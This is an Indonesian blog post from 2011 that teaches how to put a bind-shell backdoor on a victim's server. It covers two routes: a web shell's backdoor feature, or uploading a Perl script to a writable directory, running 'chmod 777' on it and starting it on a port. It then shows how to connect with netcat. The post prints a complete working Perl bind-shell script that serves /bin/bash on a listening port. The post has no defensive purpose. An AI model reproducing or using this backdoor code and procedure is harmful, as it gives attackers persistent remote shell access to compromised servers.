Kamis, 20 Januari 2011

[BackDoor] BindShell

Apa itu Bindshell ?
Bindshell adalah membuka port diserver korban untuk melakukan koneksi jarak jauh.
Biasanya bindshell dilakukan dengan menggunakan aplikasi backdoor host pada shell atau juga bisa menggunakan script bindshell seperti script perl, c, dll.

Bagaimana Melakukan Bindshell ?
Disini saya menjelaskan dengan 2 cara yaitu dengan shell dan script.

# install port menggunakan shell
Kalau menggunakan shell, tinggal kalian cari aplikasi backdoor host yang sudah tersedia dishell. misal dilocus, tinggal klik backdoor host terus install portnya (contoh port: 5992)
setelah sukses terinstall. Maka buka Netcat anda dicommand prompt.
ketik: nc -vv [ip_server_korban] [port]

# Install port menggunakan script
Jika menggunakan script. contoh script bindshell perl maka, upload dulu script perl tersebut didirectory yg write. misal didirektori tmp. stelah diupload ubah permissionnya menjadi 777 dengan menggunakan perintah: chmod 777 namascript.pl

Setelah itu, jalankan script tersebut dengan perintah:
command: perl namascript.pl port
contoh: perl namascript.pl 5992

Jika sudah diisntall, buka netcat anda. kemudian ketik:
command: nc -vv ip_korban port
contoh: nc -vv 192.168.202.4 5992

Script perl bindshell:
Code:
#!/usr/bin/perl
$SHELL="/bin/bash -i";
if (@ARGV < 1) { exit(1); } $LISTEN_PORT=$ARGV[0]; use Socket; $protocol=getprotobyname('tcp'); socket(S,&PF_INET,&SOCK_STREAM,$protocol) || die "Cant create socket\n"; setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1); bind(S,sockaddr_in($LISTEN_PORT,INADDR_ANY)) || die "Cant open port\n"; listen(S,3) || die "Cant listen port\n"; while(1) { accept(CONN,S); if(!($pid=fork)) { die "Cannot fork" if (!defined $pid); open STDIN,"<&CONN"; open STDOUT,">&CONN";
open STDERR,">&CONN";
exec $SHELL || die print CONN "Cant execute $SHELL\n";
close CONN;
exit 0;
}
}
Sumber
Always With US BeaCheater

0 komentar:

Posting Komentar